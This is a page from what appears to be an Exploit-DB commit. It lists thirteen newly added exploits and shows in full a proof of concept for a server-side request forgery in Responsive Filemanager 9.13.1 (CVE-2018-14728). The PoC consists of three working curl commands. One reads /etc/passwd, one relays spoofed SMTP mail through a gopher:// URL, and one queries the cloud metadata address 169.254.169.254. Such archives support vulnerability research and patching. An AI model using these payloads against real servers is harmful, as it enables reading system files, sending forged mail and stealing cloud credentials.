1d21694058
13 changes to exploits/shellcodes reSIProcate 1.10.2 - Heap Overflow CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH) Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit) Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page) Responsive Filemanager 9.13.1 - Server-Side Request Forgery Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Sitecore.Net 8.1 - Directory Traversal Monstra 3.0.4 - Cross-Site Scripting TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot) TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)
13 lines
No EOL
1.1 KiB
Text
13 lines
No EOL
1.1 KiB
Text
# Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery
|
|
# Date: 2018-07-29
|
|
# Exploit Author: GUIA BRAHIM FOUAD
|
|
# Vendor Homepage: http://responsivefilemanager.com/
|
|
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
|
|
# Version: 9.13.1
|
|
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
|
|
# CVE : CVE-2018-14728
|
|
|
|
# PoC
|
|
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
|
|
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a'
|
|
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=http://169.254.169.254/openstack' |